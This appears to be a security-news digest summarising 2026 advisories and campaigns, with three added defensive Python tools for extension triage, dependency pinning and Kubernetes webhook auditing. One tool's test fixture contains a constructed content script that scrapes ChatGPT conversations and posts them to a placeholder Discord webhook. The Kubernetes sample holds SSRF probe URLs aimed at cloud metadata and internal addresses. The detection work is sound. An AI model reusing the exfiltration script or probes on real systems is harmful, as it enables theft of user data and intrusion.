Citrix NetScaler CVE-2026-3055: Memory Overread via Malformed SAML AuthnRequest
WatchTowr Labs has published research on CVE-2026-3055, a critical memory overread vulnerability (CVSS 4.0 score 9.3) affecting Citrix NetScaler ADC and NetScaler Gateway. The flaw, rooted in insufficient input validation within the appliance's C-based XML/SAML parser, is exploitable only when the device is configured as a SAML Identity Provider. Successful exploitation leaks heap memory contents to unauthenticated attackers via the NSC_TASS response cookie. The vulnerability echoes the earlier CitrixBleed incidents and reinforces a pattern of fragile memory handling in NetScaler appliances. Citrix has released patched versions, and organizations are strongly urged to upgrade immediately. The researchers also found additional, similar vulnerabilities, which have been privately disclosed to Citrix's PSIRT team.
CVE-2025-33073: NTLM Reflection Resurrects One-Hop Path to Active Directory Domain Compromise
CVE-2025-33073 is a critical Windows SMB client vulnerability that revives NTLM reflection attacks, enabling any authenticated domain user with network access to achieve SYSTEM-level remote code execution on unpatched, domain-joined machines without SMB signing. Unlike prior NTLM relay techniques, this vulnerability requires no administrative privileges as a prerequisite. When combined with unconstrained delegation — a legacy Kerberos configuration still prevalent in many enterprises — attackers can coerce a domain controller to authenticate to a compromised host, capture its Ticket Granting Ticket, and perform a DCSync to fully compromise the domain. Organizations that have hardened domain controllers but neglected the systems one hop away remain exposed. Immediate patching, enabling SMB signing on delegation hosts, and auditing unconstrained delegation configurations are the recommended priority actions.
TeamPCP Multi-Ecosystem Supply Chain Campaign: LiteLLM PyPI Compromise and AI Infrastructure Credential Theft
The criminal group TeamPCP orchestrated a sophisticated multi-ecosystem supply chain campaign that compromised LiteLLM, a widely used AI proxy package downloaded 3.4 million times daily. Two malicious PyPI versions (1.82.7 and 1.82.8) deployed a three-stage payload harvesting cloud credentials, SSH keys, Kubernetes secrets, and LLM API keys from over 50 secret categories. The attack originated from a compromised Trivy security scanner GitHub Action and cascaded through npm, Docker Hub, Checkmarx KICS, and ultimately LiteLLM. The campaign shows how AI proxy services that centralize API keys become high-value targets in supply chain attacks. PyPI quarantined both versions approximately three hours after community discovery; whether the harvested credentials were subsequently used has not been publicly confirmed.
A critical authenticated privilege escalation vulnerability (CVE-2026-2931) has been identified in Amelia Booking Pro versions up to and including 9.1.2, a widely deployed WordPress appointment scheduling plugin with over 50,000 active installations. The flaw allows any authenticated Amelia customer to reset the password of arbitrary WordPress accounts, including site administrators, by manipulating an identity-linking field during a profile update request. Successful exploitation provides an attacker with full WordPress administrative access, enabling malicious plugin installation, backdoor deployment, visitor redirection, customer data exfiltration, and potentially Remote Code Execution on the underlying server. No vendor patch was available at the time of public disclosure.
CVE-2026-20079: Cisco Secure Firewall Management Center Authentication Bypass and Root RCE Exploit Chain Analysis
VulnCheck's Initial Access Intelligence team has published a detailed exploit development analysis for CVE-2026-20079, a CVSS 10.0 unauthenticated remote code execution vulnerability in Cisco Secure Firewall Management Center (FMC). The vulnerability stems from an improper boot-time process that creates a persistent machine-user session with a static, predictable session ID ('csm_processes') in the authentication database. By chaining session fixation, hardcoded credential abuse, CSRF token extraction, arbitrary file write, and a license upgrade installer mechanism, an unauthenticated remote attacker can achieve root-level code execution. Approximately 300–700 FMC instances are estimated to be exposed on the public internet, making this a significant risk for organizations relying on Cisco FMC for network security management.
Asset-Aware Threat Detection and Defense for High-Value Assets Using Microsoft Defender and Security Exposure Management
Organizations face escalating risk to their most critical systems — domain controllers, web servers, and identity infrastructure — which are targeted in over 78% of human-operated cyberattacks. Microsoft Defender, integrated with Microsoft Security Exposure Management, applies asset-aware, context-enriched protections that go beyond traditional behavioral detection. By classifying High-Value Assets (HVAs) and understanding their roles, Defender can elevate weak signals into high-confidence detections and preventions. Key recommendations include ensuring complete HVA classification coverage, prioritizing security posture improvements and alert response for HVAs, and triaging vulnerabilities based on asset criticality rather than severity score alone.
TeamPCP Supply Chain Campaign Expands: Telnyx PyPI Package Backdoored in Multi-Ecosystem Attack Series
The TeamPCP threat actor group has compromised the official Telnyx Python SDK on PyPI, marking the latest escalation in a weeks-long supply chain attack campaign spanning multiple ecosystems. The campaign follows a consistent pattern: compromise a trusted security or developer tool, steal credentials from CI/CD pipelines, and use those credentials to push malicious package versions to downstream consumers. Prior targets include Aqua Security's Trivy scanner, 46+ npm packages via CanisterWorm, Checkmarx GitHub Actions and VSX extensions, and LiteLLM. Organizations using affected packages should immediately remove malicious versions, rotate all secrets accessible from impacted environments, and monitor for C2 communications to 83[.]142[.]209[.]203.
Predictive Blockchain Intelligence: The Evolution of Defensive AI Against Crypto-Enabled Financial Crime
Criminal enterprises have rapidly adopted AI to scale fraud and automate money laundering, with AI-enabled scam activity increasing roughly 500% in 2025 and over USD 35 billion sent to fraud schemes. Current blockchain intelligence tools — while foundational — remain largely reactive. The next phase of defensive AI shifts emphasis upstream: predictive typology modeling, continuous multi-chain surveillance, and coordinated real-time intervention. Critically, responsible design — including explainability, privacy protections, and human oversight — is not optional but essential for legal defensibility and government deployment. The most effective enforcement model will be hybrid, combining machine-scale analysis with human judgment for high-stakes decisions.
Three China-Aligned Cyberespionage Clusters Converge on Southeast Asian Government Target
Palo Alto Networks Unit 42 uncovered a persistent cyberespionage campaign targeting a Southeast Asian government organization, involving three distinct but potentially coordinated activity clusters. The first cluster is attributed with high confidence to Stately Taurus, deploying USB-propagated malware (USBFect/HIUPAN) and the PUBLOAD backdoor. The second cluster, CL-STA-1048, deployed a diverse espionage toolkit including EggStremeFuel, Masol RAT, EggStreme Loader with Gorem RAT, and a novel infostealer named TrackBak. The third cluster, CL-STA-1049, used a newly identified Hypnosis loader to deploy FluffyGh0st RAT, linked to Unfading Sea Haze. All three clusters exhibit strong links to China-aligned threat actors, suggesting a coordinated effort to achieve persistent access to sensitive government networks for long-term intelligence collection.
Malicious Chrome Extension 'ChatGPT Ad Blocker' Discovered Exfiltrating User Conversations via Discord Webhook
A malicious Chrome extension named 'ChatGPT Ad Blocker' was discovered on the Google Chrome Web Store, designed to steal users' ChatGPT conversation data under the guise of blocking ads. Linked to the GitHub account 'krittinkalra' and the associated services AI4ChatCo and Writecream, the extension capitalizes on OpenAI's decision to serve advertisements on its free tier. Rather than blocking ads, the extension harvests full conversation content, user prompts, and page metadata and exfiltrates them to a private Discord channel via a hardcoded webhook. Users and organizations relying on ChatGPT should treat this extension and the affiliated developer services with extreme caution, as the scope of data theft may extend beyond this single extension.
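The exfiltration pattern above (read the page, POST it to a hardcoded Discord webhook) is easy to triage statically. The following is an added example, not code from the researchers who reported the extension: it scans an unpacked extension's files for Discord webhook URLs, checks whether the manifest grants access to the hosts you care about, and looks for an outbound POST in the same script. The manifest and content script are constructed samples, the webhook ID and token are placeholders, and the list of "sensitive" hosts is an assumption for this example.

```python
"""Static triage for a browser extension that reads page content and posts it to
a hardcoded Discord webhook. Added example; the files below are constructed."""
import json
import re

# Discord webhook URLs have a fixed shape: numeric channel/webhook ID, then a token.
DISCORD_WEBHOOK_RE = re.compile(
    r"https://(?:discord|discordapp)\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)")
SENSITIVE_HOSTS = ("chatgpt.com", "openai.com")   # assumption for this example

# Constructed sample of an unpacked extension (path -> file contents).
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "ChatGPT Ad Blocker",
        "permissions": ["storage", "scripting"],
        "host_permissions": ["https://chatgpt.com/*", "https://chat.openai.com/*"],
        "content_scripts": [{"matches": ["https://chatgpt.com/*"], "js": ["content.js"]}],
    }),
    "content.js": """
        // constructed: collects conversation text and posts it off-site every 15s
        const HOOK = "https://discord.com/api/webhooks/123456789012345678/AbCdEf_placeholder-token";
        function grab() { return [...document.querySelectorAll('[data-message-author-role]')].map(e => e.innerText); }
        setInterval(() => fetch(HOOK, {method: "POST", headers: {"Content-Type": "application/json"},
            body: JSON.stringify({content: JSON.stringify({url: location.href, msgs: grab()})})}), 15000);
    """,
}

def find_webhooks(files):
    """(path, webhook_id) for every hardcoded Discord webhook in script files.
    The token is deliberately not returned so the report itself is safe to share."""
    return [(path, m.group(1))
            for path, text in files.items() if not path.endswith(".json")
            for m in DISCORD_WEBHOOK_RE.finditer(text)]

def sensitive_host_access(manifest):
    """Host patterns (host_permissions and content_scripts.matches) touching sensitive hosts."""
    patterns = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        patterns.extend(cs.get("matches", []))
    return sorted({p for p in patterns if any(h in p for h in SENSITIVE_HOSTS)})

def posts_to_webhook(files):
    """True if some script both holds a webhook URL and issues a fetch/XHR POST."""
    for path, text in files.items():
        if path.endswith(".json"):
            continue
        if (DISCORD_WEBHOOK_RE.search(text)
                and re.search(r"\bfetch\(|XMLHttpRequest", text)
                and re.search(r"method\s*:\s*['\"]POST['\"]", text)):
            return True
    return False

def triage(files):
    """Combine the three signals into a verdict: clean / review / exfiltration-likely."""
    manifest = json.loads(files["manifest.json"])
    hooks = find_webhooks(files)
    hosts = sensitive_host_access(manifest)
    if hooks and hosts and posts_to_webhook(files):
        verdict = "exfiltration-likely"
    elif hooks:
        verdict = "review"
    else:
        verdict = "clean"
    return {"webhooks": hooks, "sensitive_hosts": hosts, "verdict": verdict}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EXTENSION), indent=2))
```

A webhook URL on its own is not proof of theft (legitimate extensions do post notifications), which is why the verdict only escalates when the same script also reads a sensitive origin and POSTs outbound.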
Metasploit Framework Release: NTLM Relay Improvements and New Exploit Modules for Critical CVEs
A new Metasploit Framework release introduces significant improvements to SMB NTLM relay functionality and adds three new exploit modules targeting critical vulnerabilities. The NTLM relay server now supports a broader range of clients, including Linux's smbclient, by altering its relaying strategy when a single target is specified. New modules cover an unauthenticated RCE in Eclipse Che machine-exec (CVE-2025-12548), a command injection vulnerability in Barracuda Email Security Gateway appliances (CVE-2023-2868), and an ESC/POS printer command injection flaw (CVE-2026-23767). Five bug fixes and one enhancement to environment variable handling in post modules are also included.
PCP Team Supply Chain Attacks: Measuring the Compromise Radius of trivy-action and litellm
The PCP Team executed supply chain attacks against two widely-used development ecosystem components: AquaSecurity's trivy-action GitHub Action and the Python litellm package. GitGuardian's analysis identified 474 repositories that executed malicious trivy-action code during the compromise window, with high-profile organizations including Canonical, Microsoft, and NASA among potential victims. For litellm, 1,705 PyPI packages were configured to automatically pull compromised versions, including highly popular projects such as dspy (5M monthly downloads) and google-cloud-aiplatform (181M monthly downloads). These figures represent lower bounds, as private repositories and transitive dependencies extend the true scope beyond what publicly available data can reveal.
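The exposure counts above come from two kinds of floating references: Python requirement specifiers that admit a newly published version, and GitHub Actions referenced by a mutable tag rather than a commit SHA. The following added example (not GitGuardian's code, nor any project's) checks both for the LiteLLM and trivy-action cases described in this and the earlier TeamPCP entries. The compromised litellm versions (1.82.7 and 1.82.8) are taken from the page; the requirements file, the workflow snippet and the 40-hex SHA in it are constructed samples, and the specifier parser covers only plain dotted numeric versions (no pre-release or local-version segments).

```python
"""Dependency-exposure checks for the TeamPCP-style compromises: would this
requirements.txt have resolved to a compromised litellm release, and which
GitHub Actions are pinned to a movable tag? Added example with constructed data."""
import re

COMPROMISED = {"litellm": {"1.82.7", "1.82.8"}}   # versions named on the page

def vkey(version):
    """'1.82.7' -> (1, 82, 7). Shorter tuples are zero-padded when compared."""
    return tuple(int(p) for p in version.split("."))

def _cmp(a, b):
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)

def clause_admits(clause, version):
    """Does one PEP 440-style clause ('>=1.80', '==1.82.*', '~=1.82.0') admit version?"""
    m = re.match(r"(===|==|!=|~=|>=|<=|>|<)\s*([0-9][0-9.]*)(\.\*)?$", clause.strip())
    if not m:
        raise ValueError(f"unsupported clause: {clause!r}")
    op, target, wildcard = m.groups()
    v, t = vkey(version), vkey(target)
    if op in ("==", "==="):
        return v[:len(t)] == t if wildcard else _cmp(v, t) == 0
    if op == "!=":
        return not (v[:len(t)] == t if wildcard else _cmp(v, t) == 0)
    if op == "~=":                      # ~=1.82.0 means >=1.82.0 and ==1.82.*
        return _cmp(v, t) >= 0 and v[:len(t) - 1] == t[:-1]
    c = _cmp(v, t)
    return {">=": c >= 0, "<=": c <= 0, ">": c > 0, "<": c < 0}[op]

def spec_admits(spec, version):
    """A full specifier ('>=1.80,<2') admits the version if every clause does; empty = unpinned."""
    return all(clause_admits(c, version) for c in spec.split(",") if c.strip())

def parse_requirement(line):
    """'litellm[proxy]>=1.80  # note' -> ('litellm', '>=1.80'); extras and comments dropped."""
    m = re.match(r"\s*([A-Za-z0-9_.-]+)\s*(?:\[[^\]]*\])?\s*(.*?)\s*(?:#.*)?$", line)
    return m.group(1).lower().replace("_", "-"), m.group(2)

def exposed_requirements(requirements_text, compromised=COMPROMISED):
    """List (package, specifier, compromised versions that specifier lets pip resolve to)."""
    hits = []
    for line in requirements_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        name, spec = parse_requirement(line)
        bad = sorted(v for v in compromised.get(name, ()) if spec_admits(spec, v))
        if bad:
            hits.append((name, spec, bad))
    return hits

def unpinned_actions(workflow_text):
    """Actions referenced by tag/branch instead of a 40-hex commit SHA; a tag can be moved
    to a compromised commit, a SHA cannot. Local (./) and docker:// references are skipped."""
    out = []
    for m in re.finditer(r"uses:\s*([^\s#]+)", workflow_text):
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        action, _, pin = ref.partition("@")
        if not re.fullmatch(r"[0-9a-f]{40}", pin):
            out.append((action, pin or "<default branch>"))
    return out

SAMPLE_REQUIREMENTS = """
# constructed sample requirements.txt
litellm>=1.80          # floating range: would have pulled 1.82.7 / 1.82.8
litellm==1.82.6        # exact pin: not affected
litellm~=1.82.0        # compatible-release range: admits both bad versions
requests>=2.31
"""

SAMPLE_WORKFLOW = """
steps:
  - uses: actions/checkout@v4
  - uses: aquasecurity/trivy-action@0.28.0
  - uses: aquasecurity/trivy-action@6e7b7d1fd3e4fef0c5fa8cce1229c54b2c9bd0d8  # placeholder SHA, not a real commit
"""

if __name__ == "__main__":
    print(exposed_requirements(SAMPLE_REQUIREMENTS))
    print(unpinned_actions(SAMPLE_WORKFLOW))
```

Run it against a real requirements.txt and .github/workflows/*.yml by reading the files into the two functions; for lock files (poetry.lock, uv.lock) the pinned version is exact, so compare it directly against the compromised set instead.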
CVE-2020-8561: Kubernetes API Server SSRF via Webhook Configuration and Debug Profiling Exploitation
CVE-2020-8561 is a Kubernetes vulnerability for which no patch exists; it enables Server-Side Request Forgery (SSRF) against the kube-apiserver. An attacker with elevated privileges, typically cluster-admin, chains two capabilities: creating validatingwebhookconfigurations objects whose clientConfig.url points at an arbitrary address, which forces the API server to make outbound requests on the attacker's behalf, and using the debug endpoint exposed by the default --profiling=true setting to raise the API server's log verbosity so that the full webhook responses appear in its logs. This is particularly dangerous in managed Kubernetes environments, where the control plane resides in a privileged cloud-provider network zone that is normally unreachable from cluster workloads. Mitigations include running the API server with --profiling=false and enforcing network segmentation around the control plane to limit what an SSRF can reach.
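Both halves of the chain leave an audit trail that can be checked offline from `kubectl get validatingwebhookconfigurations -o json` and the kube-apiserver command line. The following added example (not code from the referenced research or the Kubernetes project) flags webhooks that bypass in-cluster Service routing via clientConfig.url, classifies where the callback would land (link-local metadata service, private control-plane ranges, public or DNS targets), and reports whether profiling was left at its default. The webhook objects and flag lists are constructed samples.

```python
"""Audit helpers for the CVE-2020-8561 SSRF pattern: out-of-cluster webhook URLs
plus kube-apiserver profiling/debug endpoints left enabled. Added example with
constructed sample data."""
import ipaddress
import json
from urllib.parse import urlparse

# Constructed sample: one normal in-cluster webhook, two probes at internal
# addresses, and one external SaaS policy endpoint.
SAMPLE_WEBHOOK_LIST = json.loads("""
{
  "items": [
    {"metadata": {"name": "cert-manager-webhook"},
     "webhooks": [{"name": "webhook.cert-manager.io",
                   "clientConfig": {"service": {"namespace": "cert-manager",
                                                "name": "cert-manager-webhook", "path": "/validate"}}}]},
    {"metadata": {"name": "attacker-probe"},
     "webhooks": [{"name": "metadata.probe",
                   "clientConfig": {"url": "https://169.254.169.254/latest/meta-data/"}},
                  {"name": "cp-internal.probe",
                   "clientConfig": {"url": "https://10.0.0.5:8443/"}}]},
    {"metadata": {"name": "saas-policy"},
     "webhooks": [{"name": "policy.example.com",
                   "clientConfig": {"url": "https://policy.example.com/validate"}}]}
  ]
}
""")

def classify_target(url):
    """Label where the API server would be made to connect for an external webhook URL."""
    host = urlparse(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external-dns"       # hostname: still an out-of-cluster callback
    if ip.is_link_local:
        return "link-local"         # cloud metadata services (169.254.169.254) live here
    if ip.is_private or ip.is_loopback:
        return "private"            # provider control-plane or other internal ranges
    return "public"

def find_external_webhooks(webhook_list):
    """(configName, webhookName, url, label) for webhooks using clientConfig.url
    instead of an in-cluster Service reference."""
    findings = []
    for cfg in webhook_list.get("items", []):
        cfg_name = cfg["metadata"]["name"]
        for hook in cfg.get("webhooks", []):
            url = hook.get("clientConfig", {}).get("url")
            if url:
                findings.append((cfg_name, hook["name"], url, classify_target(url)))
    return findings

def profiling_enabled(apiserver_args):
    """--profiling defaults to true; only an explicit false turns off /debug/pprof
    and the /debug/flags/v verbosity endpoint. A bare '--profiling' means true."""
    for arg in apiserver_args:
        if arg.startswith("--profiling"):
            _, _, value = arg.partition("=")
            return value.strip().lower() not in ("false", "0")
    return True

def audit(webhook_list, apiserver_args):
    """Full report; high_risk = callbacks into link-local or private address space."""
    findings = find_external_webhooks(webhook_list)
    return {
        "profiling_enabled": profiling_enabled(apiserver_args),
        "external_webhooks": findings,
        "high_risk": [f for f in findings if f[3] in ("link-local", "private")],
    }

if __name__ == "__main__":
    # Constructed sample kube-apiserver command line that never set --profiling.
    args = ["kube-apiserver", "--secure-port=6443", "--authorization-mode=Node,RBAC"]
    print(json.dumps(audit(SAMPLE_WEBHOOK_LIST, args), indent=2))
```

On a managed control plane you usually cannot read the apiserver flags, so the webhook half of the audit is the actionable part there; pair it with an admission policy that rejects clientConfig.url outright unless the target is on an allow-list.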
Why Traditional Security Testing Fails for AI Systems: Foundations for Testing LLMs and ML in Production
This article, the first in a five-part series by NVISO, examines why conventional security testing methodologies are fundamentally misaligned with AI and LLM systems. The author argues that assumptions underpinning traditional testing — deterministic input-output mappings, explicit security boundaries, and exhaustive coverage — break down when applied to probabilistic, generative AI. Real-world evidence underscores the urgency: prompt injection reports grew 540% year-over-year in 2025, and 97% of organizations that experienced AI-related breaches lacked proper AI access controls. The article frames AI security testing as a shift from asserting exact values to validating behavioral bounds, and situates this within regulatory obligations such as the EU AI Act and voluntary frameworks like NIST AI RMF and MITRE ATLAS.
Cisco Talos Discloses 30 Vulnerabilities Across HikVision, TP-Link, and Canva Affinity
Cisco Talos' Vulnerability Discovery & Research team has disclosed a total of 30 vulnerabilities spanning three major vendors: HikVision, TP-Link, and Canva Affinity. All vulnerabilities have been patched by their respective vendors in accordance with Cisco's third-party vulnerability disclosure policy. The flaws range in severity and impact, with several enabling remote or arbitrary code execution, sensitive data disclosure, and credential leakage. Organizations using affected products — particularly TP-Link Archer AX53 routers, HikVision Ultra Face Recognition Terminals, and Canva Affinity design software — are strongly encouraged to apply available patches and leverage updated Snort rule sets for detection coverage.
TeamPCP Compromises Aqua Security Internal GitHub Organization, Defacing 44 Repositories via Stolen Service Account Token
The threat actor TeamPCP (aka DeadCatx3, PCPcat, ShellForce, CanisterWorm) successfully compromised Aqua Security's internal GitHub organization aquasec-com, defacing all 44 repositories in a scripted two-minute burst. Every repository was renamed with a 'tpcp-docs-' prefix and had its description changed to 'TeamPCP Owns Aqua Security.' Exposed repositories include internal source code for Tracee, Trivy forks, CI/CD pipelines, Kubernetes operators, and team knowledge bases. The attack vector is attributed with high confidence to a stolen PAT for the Argon-DevOps-Mgt service account, likely harvested during TeamPCP's prior Trivy GitHub Actions supply chain compromise. The incident represents a significant escalation in TeamPCP's ongoing campaign targeting the cloud-native security ecosystem.
PolyShell: Critical File Upload Vulnerability Actively Exploited in Magento and Adobe Commerce
PolyShell is a critical vulnerability in Magento Open Source 2 and Adobe Commerce, located in the REST API endpoint that handles file uploads for custom product options. Successful exploitation can result in Remote Code Execution, Stored Cross-Site Scripting, account takeover, and deployment of payment card skimmers, posing severe risk to e-commerce organizations handling sensitive customer and payment data. The vulnerability is actively exploited in the wild. A fix is available only in the pre-release version 2.4.9-beta1, leaving most production deployments currently exposed. Organizations are urged to apply the fix where feasible, restrict API exposure, enforce strict file validation, and implement enhanced monitoring and incident response measures immediately.
Large-Scale Magecart Campaign Leverages WebSocket Exfiltration and Payment Page Mimicry Across 100+ Domains
A sophisticated, long-running Magecart campaign has been identified targeting e-commerce websites globally, with operations sustained for over 24 months across more than 100 domains. Seventeen WooCommerce sites across at least 12 countries have been confirmed as victims, with notable concentration in Spain, France, and the United States. While merchants are the initial compromise targets, the primary financial and reputational impact falls on banks and payment processors through stolen card data. The campaign's durability stems from multi-stage payload delivery, dynamic infrastructure rotation, and high-fidelity mimicry of legitimate payment providers—most notably Spain's Redsys system—making fraudulent transactions appear credible to unsuspecting cardholders.
Keitaro Abuse Exposed: How Threat Actors Weaponize Commercial Adtech Across a Broad Spectrum of Cybercrime
Infoblox Threat Intel and Confiant present the second installment of a four-month study on the abuse of Keitaro, a commercial advertising performance tracker exploited by a wide range of threat actors. Over 20% of threat actors tracked by Confiant during the study period leveraged Keitaro, with some campaigns generating tens of millions of impressions. Threat activity spans malware delivery, cryptocurrency wallet draining, phishing, investment scams, fake pharmaceuticals, online gambling, and domain hijacking. Approximately 96% of spam campaigns linking to Keitaro instances led to cryptocurrency wallet drainers. Named actors include TilapiaParabens, HircusPircus, AirportArrest, and TheNovosti, alongside numerous unattributed clusters. The majority of observed Keitaro instances are tied to Eastern European operators, frequently hosted on bulletproof infrastructure or fronted by Cloudflare.
Leak Bazaar: How Cybercriminals Are Building Post-Exfiltration Data Processing Marketplaces
A new criminal service called 'Leak Bazaar,' advertised on the Russian-speaking TierOne forum by a user known as Snow, represents a significant evolution in ransomware and extortion economics. Rather than simply hosting raw stolen data, Leak Bazaar positions itself as a managed post-exfiltration processing layer that filters, categorizes, and repackages corporate data into buyer-oriented segments such as financial reporting, M&A intelligence, R&D material, and personal data. The platform offers a 70/30 revenue split favoring data suppliers, supports both exclusive and multi-buyer sales models, and embeds itself into victim negotiation workflows. This model transforms failed ransom events into structured, recurring revenue streams, signaling a maturation of the criminal data marketplace.
From Celebrity Deepfakes to Avatar Farms: How Scammers Are Industrializing Synthetic Trust
Scammers are evolving beyond celebrity deepfakes toward industrialized 'avatar farms' that manufacture synthetic presenters to deliver fraudulent pitches at scale. Unlike celebrity impersonation, AI-generated avatars carry no real-world identity, making them harder to debunk and cheaper to reuse across topics and languages. Research reveals that the most prevalent 'presenters' in scam-labeled videos are not real people but AI-generated avatars sourced from services on freelance marketplaces. The true engine of these scams is the message — urgent scripts, false promises, and pressure tactics — not the face. Audio-first detection methods are proving more reliable than visual analysis alone, especially since some scams overlay fraudulent narration onto legitimate footage, bypassing face-based detection entirely.
Iranian-backed cyber operations have significantly escalated, driven by geopolitical conflict involving the US and Israel. A 700% spike in cyberattacks against Israel has been recorded, with pro-Iran groups conducting DDoS campaigns, destructive wiper deployments, hack-and-leak operations, and OT/ICS targeting across Gulf energy infrastructure, water systems, and defense sectors. Notable incidents include the Handala group's attack on medical technology firm Stryker and Cotton Sandstorm's reactivation after a year of silence. CISA has issued multiple Iran-specific advisories reflecting sustained intelligence community concern. Iranian actors have also expanded ransomware collaboration with criminal networks and are abusing cloud infrastructure for follow-on operations, representing a strategic shift toward hybrid criminal-state partnerships.
Reservation Hijack Scam: How Attackers Compromise Hotel Management Platforms to Defraud Travelers
The Reservation Hijack Scam is a sophisticated fraud campaign targeting hotel guests by exploiting compromised hospitality management platforms and booking workflows. Unlike generic phishing, attackers first steal credentials from hotel staff to access real reservation data via platforms such as Cloudbeds and Booking.com partner accounts. Armed with genuine booking context, they contact travelers via WhatsApp, SMS, or email with highly personalized messages that mimic routine customer service. In the most dangerous variants, attackers operate directly through legitimate hotel communication channels, making fraud nearly indistinguishable from authentic hotel contact. The campaign is active across Western Europe, the US, Brazil, and Australia, and can result in payment card theft, financial fraud, and broader account compromise.
Kinsing Botnet Expands Exploit Arsenal with CVE-2025-55182 Alongside Legacy CVEs on Shared Infrastructure
VulnCheck's Canary Intelligence team identified active Kinsing botnet exploitation across three CVEs — CVE-2023-46604 (Apache ActiveMQ), CVE-2023-38646 (Metabase), and the newly observed CVE-2025-55182 (React2Shell) — all converging on shared attacker infrastructure. The attacker node at 212[.]113[.]98[.]30 delivered payloads through a common staging host at 78[.]153[.]140[.]16. This clustering demonstrates Kinsing's continued relevance without requiring new binaries, instead leveraging additional CVEs to expand its attack surface. The campaign deploys a classic Kinsing toolkit: a Go-based cryptomining payload and a rootkit (libsystem.so) that hides malicious files and network activity within user-space processes.